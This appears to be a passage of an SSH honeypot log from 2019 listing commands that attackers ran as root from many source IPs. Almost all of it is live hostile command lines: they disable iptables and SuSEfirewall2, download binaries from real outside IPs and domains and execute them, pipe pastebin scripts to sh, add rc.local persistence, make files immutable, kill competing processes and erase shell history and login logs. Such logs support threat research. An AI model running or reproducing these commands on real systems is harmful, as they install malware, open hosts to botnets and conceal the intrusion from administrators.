chattr +i /tmp/aliyun.6
echo "cd /tmp/">>/etc/rc.local
echo "./aliyun.6
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 111.9.109.206 13-May-2019 05:07:57 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://blogbak.xxwlt.cn/xxwl/xxlinux;chmod 777 xxlinux;./xxlinux;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://blogbak.xxwlt.cn/xxwl/xxlinux
chmod 777 xxlinux
./xxlinux

From 31.30.120.136 14-May-2019 06:17:22 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 [kswapd9];killall -9 [kworker];killall -9 [rcu_scheds];killall -9 [kaudit];killall -9 [watchd0g];killall -9 [khelper0];killall -9 [kacpuid];killall -9 [zftpd];killall -9 [crond];killall -9 [udevd];killall -9 [khelp];killall -9 [sync_s];killall -9 [rpcbind];killall -9 rsync;killall -9 ircu;killall -9 super_z;killall -9 [pcu];killall -9 [rcu_scheds];killall -9 [kwin];killall -9 [khelper0];killall -9 [kacpuid];killall -9 [tfpd];killall -9 [crop];killall -9 [udevd];killall -9 [kh0];killall -9 [sync_t];killall -9 [rpc_bind];cd /tmp;rm -rf yc;wget -q 203.146.208.208/drago/images/.ssh/.ssh/yc || curl -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/yc;perl yc;rm -rf yc .a;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 [kswapd9]
killall -9 [kworker]
killall -9 [rcu_scheds]
killall -9 [kaudit]
killall -9 [watchd0g]
killall -9 [khelper0]
killall -9 [kacpuid]
killall -9 [zftpd]
killall -9 [crond]
killall -9 [udevd]
killall -9 [khelp]
killall -9 [sync_s]
killall -9 [rpcbind]
killall -9 rsync
killall -9 ircu
killall -9 super_z
killall -9 [pcu]
killall -9 [rcu_scheds]
killall -9 [kwin]
killall -9 [khelper0]
killall -9 [kacpuid]
killall -9 [tfpd]
killall -9 [crop]
killall -9 [udevd]
killall -9 [kh0]
killall -9 [sync_t]
killall -9 [rpc_bind]
cd /tmp
rm -rf yc
wget -q 203.146.208.208/drago/images/.ssh/.ssh/yc || curl -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/yc
perl yc
rm -rf yc .a

From 167.114.229.179 14-May-2019 20:01:03 ssh2 root
Exec (curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>
1
Exec (curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>
1
Exec (curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>
1
Exec (curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>
1
Exec (curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>
1
Exec (curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>
1
Exec (curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>
1

From 167.114.229.179 14-May-2019 20:03:12 ssh2 root
Exec (curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>
1
Exec (curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>
1

From 167.114.229.179 14-May-2019 20:05:42 ssh2 root
Exec (curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>&1 &
(curl -fsSL https://pastebin.com/raw/cWe9pWGZ||wget -q -O- https://pastebin.com/raw/cWe9pWGZ)|sh >/dev/null 2>
1

From 113.106.95.62 25-May-2019 18:08:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.3.2.156/app;chmod 777 app;./app;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://119.3.2.156/app
chmod 777 app
./app

From 31.184.193.102 3-Jun-2019 03:25:27 ssh2 root
Exec ping -q -c 1 -w 1 8.8.8.8 > /dev/null && echo OK || echo ERROR
ping -q -c 1 -w 1 8.8.8.8 > /dev/null
echo OK || echo ERROR

From 37.8.68.153 17-Jun-2019 02:38:36 ssh2 root
ls
free -g
free -m
yum update -y
apt-get update
wget http://61.91.57.222/iscan.jpg

From 222.187.221.71 17-Jun-2019 02:41:16 ssh2 root
Exec scp -r -t /root
scp -r -t /root

From 113.106.95.62 18-Jun-2019 08:53:06 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://129.204.248.16:65534/linux2.6;chmod 777 linux2.6;./linux2.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://129.204.248.16:65534/linux2.6
chmod 777 linux2.6
./linux2.6

From 5.14.250.116 19-Jun-2019 14:21:45 ssh2 root
ls
wget arhiveocdex.tk/info
perl info
apt
yum
apt-get
apt-get install perl
ls
perl
chmod +x *
ls
lscpu
free -mt
passwd
uname -a

From 82.0.237.136 19-Jun-2019 14:23:21 ssh2 root
ls
w
clear
sudo su
yum install passwd -y
apt-get install passwd -y
w
ls
cd M
cd
cd Mail
ls
apt-get install sudo su -y
cat /etc/passwd
apt install
apt-get
apt-get install passwd -y
passwd
grep "Failed password" /var/log/auth.log
ifconfig
apt-get install yum -y
perl
python
python3
w
exit

From 103.86.65.138 21-Jun-2019 01:16:02 ssh2 root
Exec curl -s http://103.86.65.138:8514/get.sh -o get.sh && bash get.sh ph_r1J0E1SFR0l2eh4= 1 && rm -f get.sh
curl -s http://103.86.65.138:8514/get.sh -o get.sh
bash get.sh ph_r1J0E1SFR0l2eh4= 1
rm -f get.sh

From 51.77.222.160 21-Jun-2019 04:51:32 ssh2 root
Exec uname -n -s -r -v ; lscpu
uname -n -s -r -v
lscpu

From 142.93.248.5 24-Jun-2019 08:04:51 ssh2 root
cd /var/tmp
cat << EOF
#!/bin/bash
cd /tmp
rm -rf .X15-unix
mkdir .X15-unix
cd .X15-unix
pkill -9 cron > .out
wget -q http://54.37.70.249/dota2.tar.gz || curl -O -f http://54.37.70.249/dota2.tar.gz
sleep 7s && tar xf dota2.tar.gz
#rm -rf dota2.tar.gz
cd .rsync
chmod 777 *
cd /tmp/.X15-unix/.rsync/a && ./cron || ./anacron
exit 0
EOF | bash

From 103.85.85.246 24-Jun-2019 13:21:11 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://103.85.85.246:81/xiaoy;chmod 777 xiaoy;./xiaoy;echo "cd /tmp/">>/etc/rc.local;echo "./xiaoy&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://103.85.85.246:81/xiaoy
chmod 777 xiaoy
./xiaoy
echo "cd /tmp/">>/etc/rc.local
echo "./xiaoy
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 51.75.123.124 24-Jun-2019 15:33:06 ssh2 root
Exec uname -n -s -r -v; cat /etc/issue
uname -n -s -r -v
cat /etc/issue

From 182.135.216.122 25-Jun-2019 10:02:41 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://156.236.96.30:8899/linux-arm;chmod 777 linux-arm;./linux-arm;echo "cd /tmp/">>/etc/rc.local;echo "./linux-arm&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://156.236.96.30:8899/linux-arm
chmod 777 linux-arm
./linux-arm
echo "cd /tmp/">>/etc/rc.local
echo "./linux-arm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 113.106.95.62 26-Jun-2019 00:51:58 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://129.204.248.16:65534/2.6;chmod 777 2.6;./2.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://129.204.248.16:65534/2.6
chmod 777 2.6
./2.6

From 182.135.216.122 26-Jun-2019 02:45:24 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://156.236.96.30:8899/linux-arm;chmod 777 linux-arm;./linux-arm;echo "cd /tmp/">>/etc/rc.local;echo "./linux-arm&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://156.236.96.30:8899/linux-arm
chmod 777 linux-arm
./linux-arm
echo "cd /tmp/">>/etc/rc.local
echo "./linux-arm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 182.135.216.122 26-Jun-2019 02:45:41 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://156.236.96.30:8899/dd-wrt;chmod 777 dd-wrt;./dd-wrt;echo "cd /tmp/">>/etc/rc.local;echo "./dd-wrt&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://156.236.96.30:8899/dd-wrt
chmod 777 dd-wrt
./dd-wrt
echo "cd /tmp/">>/etc/rc.local
echo "./dd-wrt
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 206.189.38.181 26-Jun-2019 23:05:58 ssh2 root
Exec cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://host.minekraft.club/bins/sh; chmod 777 sh; ./sh
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://host.minekraft.club/bins/sh
chmod 777 sh
./sh

From 121.207.227.91 28-Jun-2019 05:44:14 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://121.207.227.91:2019/lwq;chmod 777 lwq;./lwq;echo "cd /tmp/">>/etc/rc.local;echo "./lwq&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://121.207.227.91:2019/lwq
chmod 777 lwq
./lwq
echo "cd /tmp/">>/etc/rc.local
echo "./lwq
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 121.207.227.91 28-Jun-2019 08:53:21 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://121.207.227.91:2019/lwz;chmod 777 lwz;./lwz;echo "cd /tmp/">>/etc/rc.local;echo "./lwz&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://121.207.227.91:2019/lwz
chmod 777 lwz
./lwz
echo "cd /tmp/">>/etc/rc.local
echo "./lwz
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 121.207.227.91 30-Jun-2019 12:00:03 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://121.207.227.91:2019/lws;chmod 777 lws;./lws;echo "cd /tmp/">>/etc/rc.local;echo "./lws&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://121.207.227.91:2019/lws
chmod 777 lws
./lws
echo "cd /tmp/">>/etc/rc.local
echo "./lws
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 182.243.150.87 1-Jul-2019 03:29:04 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://http://156.236.96.30:8899/linux-arm;chmod 777 linux-arm;./linux-arm;echo "cd /tmp/">>/etc/rc.local;echo "./linux-arm&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://http://156.236.96.30:8899/linux-arm
chmod 777 linux-arm
./linux-arm
echo "cd /tmp/">>/etc/rc.local
echo "./linux-arm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 121.207.227.91 1-Jul-2019 05:13:33 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://121.207.227.91:2012/lws;chmod 777 lws;./lws;echo "cd /tmp/">>/etc/rc.local;echo "./lws&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://121.207.227.91:2012/lws
chmod 777 lws
./lws
echo "cd /tmp/">>/etc/rc.local
echo "./lws
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 183.253.7.182 4-Jul-2019 07:11:54 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.46.59:1122/LinuxTF;chmod 777 LinuxTF;./LinuxTF;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.46.59:1122/LinuxTF
chmod 777 LinuxTF
./LinuxTF

From 188.248.34.158 7-Jul-2019 05:35:37 ssh2 root
ls
wget
ifconfig

From 188.248.34.158 7-Jul-2019 05:39:49 ssh2 root
wget http://www.geteggdrop.com
exit

From 188.166.94.21 7-Jul-2019 08:20:30 ssh2 root
Exec cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://hello.skid.fun/bins/sh; chmod 777 sh; sh sh
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://hello.skid.fun/bins/sh
chmod 777 sh
sh sh

From 121.207.227.91 9-Jul-2019 21:49:12 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://121.207.227.91:2012/lqs;chmod 777 lqs;./lqs;echo "cd /tmp/">>/etc/rc.local;echo "./lqs&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://121.207.227.91:2012/lqs
chmod 777 lqs
./lqs
echo "cd /tmp/">>/etc/rc.local
echo "./lqs
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 182.243.150.78 10-Jul-2019 00:00:06 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://156.236.96.30:8899/ffgg;chmod 777 ffgg;./ffgg;echo "cd /tmp/">>/etc/rc.local;echo "./ffgg&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://156.236.96.30:8899/ffgg
chmod 777 ffgg
./ffgg
echo "cd /tmp/">>/etc/rc.local
echo "./ffgg
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 121.207.227.91 10-Jul-2019 02:16:33 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://121.207.227.91:2012/los;chmod 777 los;./los;echo "cd /tmp/">>/etc/rc.local;echo "./los&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://121.207.227.91:2012/los
chmod 777 los
./los
echo "cd /tmp/">>/etc/rc.local
echo "./los
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 121.207.227.91 11-Jul-2019 02:32:12 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://121.207.227.91:2012/lks;chmod 777 lks;./lks;echo "cd /tmp/">>/etc/rc.local;echo "./lks&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://121.207.227.91:2012/lks
chmod 777 lks
./lks
echo "cd /tmp/">>/etc/rc.local
echo "./lks
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 121.207.227.91 11-Jul-2019 15:10:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://121.207.227.91:2525/lks;chmod 777 lks;./lks;echo "cd /tmp/">>/etc/rc.local;echo "./lks&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://121.207.227.91:2525/lks
chmod 777 lks
./lks
echo "cd /tmp/">>/etc/rc.local
echo "./lks
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 136.179.27.193 14-Jul-2019 06:18:25 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://ardp.hldns.ru/bin.sh || curl http://ardp.hldns.ru/curl.sh -o curl.sh; chmod +x *.sh; ./bin.sh; ./curl.sh;' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://ardp.hldns.ru/bin.sh || curl http://ardp.hldns.ru/curl.sh -o curl.sh
chmod +x *.sh
./bin.sh
./curl.sh
' | sh

From 14.116.204.194 14-Jul-2019 10:45:51 ssh2 root
top
ls
/usr/bin/top

From 90.118.6.199 14-Jul-2019 22:44:06 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.45.8/bin.sh || curl http://46.246.45.8/curl.sh -o curl.sh || tftp 46.246.45.8 -c get tftp.sh || tftp -r tftp.sh -g 46.246.45.8; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.45.8/bin.sh || curl http://46.246.45.8/curl.sh -o curl.sh || tftp 46.246.45.8 -c get tftp.sh || tftp
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 112.242.155.30 15-Jul-2019 09:28:04 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://156.238.1.254:8989/llkkl;chmod 777 llkkl;./llkkl;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://156.238.1.254:8989/llkkl
chmod 777 llkkl
./llkkl

From 43.249.192.47 20-Jul-2019 05:03:06 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://154.223.159.5:7777/ppol;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://154.223.159.5:7777/ppol

From 43.249.192.47 20-Jul-2019 05:09:52 ssh2 root
Exec /etc/init.d/iptables stop \n 
service iptables stop \n 
SuSEfirewall2 stop \n 
reSuSEfirewall2 stop \n 
mkdir /tmp/mysql /tmp/python \n 
cd /tmp/mysql \n 
wget -c http://www.aduidc.xyz:7777/ppol \n 
chmod 777 ppol \n 
./ppol > /dev/null 2>&1 & \n 
cd /tmp/python \n 
wget -c http://www.aduidc.xyz:7777/pprt \n 
chmod 777 pprt \n 
./pprt > /dev/null 2>&1 & \n 
echo > /var/log/wtmp \n 
echo \"cd /tmp/mysql\">>/etc/rc.local \n 
echo \" ./ppol > /dev/null 2>&1 &&\">>/etc/rc.local \n 
echo \"cd /tmp/python\">>/etc/rc.local \n 
echo \" ./pprt > /dev/null 2>&1 &&\">>/etc/rc.local \n 
echo \"/etc/init.d/iptables stop\">>/etc/rc.local \n 
chattr +i /tmp/mysql/ppol \n 
chattr +i /tmp/python/pprt \n 
chattr +i /tmp/mysql/conf.n \n 
chattr +i /tmp/python/conf.n \n 
echo > /var/log/btmp /n 
echo > ./.bash_history \n
/etc/init.d/iptables stop \n service iptables stop \n SuSEfirewall2 stop \n reSuSEfirewall2 stop \n mkdir /tmp/mysql
1
\n cd /tmp/python \n wget -c http://www.aduidc.xyz:7777/pprt \n chmod 777 pprt \n ./pprt > /dev/null
1
\n echo > /var/log/wtmp \n echo \"cd /tmp/mysql\">>/etc/rc.local \n echo \" ./ppol > /dev/null 2>
1
\">>/etc/rc.local \n echo \"cd /tmp/python\">>/etc/rc.local \n echo \" ./pprt > /dev/null 2>
1
\">>/etc/rc.local \n echo \"/etc/init.d/iptables stop\">>/etc/rc.local \n chattr +i /tmp/mysql/ppol \n chattr +i /tmp/python/pprt \n chattr

From 43.249.192.47 20-Jul-2019 05:43:12 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://43.249.192.59:99/ppol;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://43.249.192.59:99/ppol

From 43.249.192.47 20-Jul-2019 06:01:15 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;chmod 777 ppol;./ppol;chattr +i /tmp/ppol;echo "cd /tmp/">>/etc/rc.local;echo "./ppol&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
chmod 777 ppol
./ppol
chattr +i /tmp/ppol
echo "cd /tmp/">>/etc/rc.local
echo "./ppol
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 43.249.192.47 20-Jul-2019 06:05:21 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://154.223.159.5/234.sh;chmod 777 234.sh;./234.sh;chattr +i /234.sh
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://154.223.159.5/234.sh
chmod 777 234.sh
./234.sh
chattr +i /234.sh

From 167.71.15.247 20-Jul-2019 06:42:12 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://irc.b0ts.club/sh; chmod 777 sh; sh sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://irc.b0ts.club/sh
chmod 777 sh
sh sh

From 42.243.243.180 20-Jul-2019 23:40:39 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://156.236.96.30:8899/Linux2.6;chmod 777 Linux2.6;./Linux2.6;echo "cd /tmp/">>/etc/rc.local;echo "./Linux2.6&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://156.236.96.30:8899/Linux2.6
chmod 777 Linux2.6
./Linux2.6
echo "cd /tmp/">>/etc/rc.local
echo "./Linux2.6
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 185.199.26.162 21-Jul-2019 08:35:58 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.38.178/bin.sh || curl http://46.246.38.178/curl.sh -o curl.sh || tftp 46.246.38.178 -c get tftp.sh || tftp -r tftp.sh -g 46.246.38.178; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.38.178/bin.sh || curl http://46.246.38.178/curl.sh -o curl.sh || tftp 46.246.38.178 -c get tftp.sh || tftp
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 187.16.96.35 21-Jul-2019 18:54:03 ssh2 root
Exec uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v

From 62.231.102.116 21-Jul-2019 20:58:16 ssh2 root
w
free -mt

From 51.145.55.218 21-Jul-2019 20:58:23 ssh2 root
Exec uname -a && lscpu
uname -a
lscpu
ls -a
naas.pl
nano reglas.pl
apt-get install nanp
get install nanp install nanp nano
clear
apt-get install nano
nano reglas.pl
clear

From 51.145.55.218 21-Jul-2019 20:59:59 ssh2 root
Exec uname -a && lscpu
uname -a
lscpu
apt-get install clear
clear
apt update
apt-get update

From 51.145.55.218 21-Jul-2019 21:00:19 ssh2 root
Exec uname -a && lscpu
uname -a
lscpu
apt-get install update

From 51.145.55.218 21-Jul-2019 21:00:36 ssh2 root
Exec uname -a && lscpu
uname -a
lscpu
uname -r
cd /var/tmp
ls -a
lhalt
halt
init 0
reboot
shutdown
kill -9 -1
asdas

From 222.186.51.34 22-Jul-2019 04:54:56 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;

wget -c http://222.186.51.34:1500/Linux-udp250;
chmod 777 Linux-udp250;
./Linux-udp250;
echo "cd /tmp/">>/etc/rc.local;
echo "./Linux-udp250&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://222.186.51.34:1500/Linux-udp250;
chmod 777 udp25000;
./udp25000;
echo "cd /tmp/">>/etc/rc.local;
echo "./udp25000&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://222.186.51.34:1500/Linux-udp250;
chmod 777 udp25000;
./udp25000;
echo "cd /tmp/">>/etc/rc.local;
echo "./udp25000&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://222.186.51.34:1500/Linux-udp250;
chmod 777 udp25000;
./udp25000;
echo "cd /tmp/">>/etc/rc.local;
echo "./udp25000&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.51.34:1500/Linux-udp250
